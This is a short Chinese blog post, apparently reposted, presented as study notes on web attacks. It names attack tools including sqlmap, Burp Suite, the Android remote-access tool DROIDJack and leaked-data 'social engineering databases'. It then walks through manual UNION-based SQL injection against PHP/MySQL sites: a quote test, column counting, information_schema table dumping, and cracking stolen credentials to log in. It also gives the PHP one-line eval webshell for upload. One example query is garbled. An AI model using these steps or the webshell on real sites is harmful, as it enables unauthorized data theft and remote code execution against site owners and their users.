超浅谈web安全中的sql注入以及上传后门

来源:互联网 发布:win7卸载不了软件 编辑:程序博客网 时间:2024/04/30 06:08

先上几道好吃的菜:firefox的hackbar工具。可以灵活的处理URL里的各种方式的加密解密。

硬菜:sqlmap 自动检测一个网站的各种可能存在的注入。-D 指定库 -T 指定表 -C 指定列 -dump-all全导出

sql注入工具有很多种:比较旧版本的啊D,sqlmap等。

阻包、抓包:brupsuite

浏览器黑客插件:firfox的hackbar

比较可怕的上网:搜索 来自iphone 百度云,社工库..其他网站不给予分享。0 0

手机远控:DROIDJack



(以下内容只在.php上面进行相应的测试,没有因为什么,因为我是只会PHP的菜鸟...)

一般的sql URL攻击步骤: 

1、在index.php?id=4后面加入单引号,如果页面出现问题,说明select语句组装的时候出现问题,存在sql注入漏洞。

2、输入 and 1=1 显示正常 and 1=2不正常进一步确认注入漏洞

3、开始进行注入:

以PHP+MYSQL为例

首先判断有几个字段,order by n(n为随机猜的数,二分法查找最快),只要找到临界条件下的n即可确定列数为n-1

其次,找到列数以后,假设n=5 那么在url 后拼装 union select 1,2,3,4,5 在网页的相应位置就会显示出相应的位,也就是注入点。例如暴露出注入点2

那么接下来就可以进行数据库信息的查看,比如查看数据库名database(),查看数据库版本version(),还有各种数据库函数都可以直接执行。附上几个常用的mysql数据库函数。

函数列表:


找到数据库名以后,进行猜表。mysql中的information_schema有着很恐怖的作用(假设如果它还存在的话)table_name和table_schema 对应的数据库和数据表冗余数据,在这里就可以把库中所有的数据表,找出来了,很简单的select语句。比如说 union select 1,group_concat(table_name),3,4,5 from information_schema where information_shcema.table_sh 很轻松的可以拿到数据。至于拿到用户名和密码之后,可以尝试各种解密,找到前台和后台入口进行登录,随心所欲。


上传后门:

目前很多后端已经阻止了普通的上传漏洞。所以普通的方法已经无法实现攻击,不过以PHP为例,最典型的是一句话后门。<?php @eval($_POST['参数密码'])  只要把这个文件通过上传放到后台就可以直接在远程进行奇怪的操作,当然chopper也可以使用了,看权限配置。


= =以上内容为学习笔记,仅供参考,至于做了什么事与本人无关!




0 0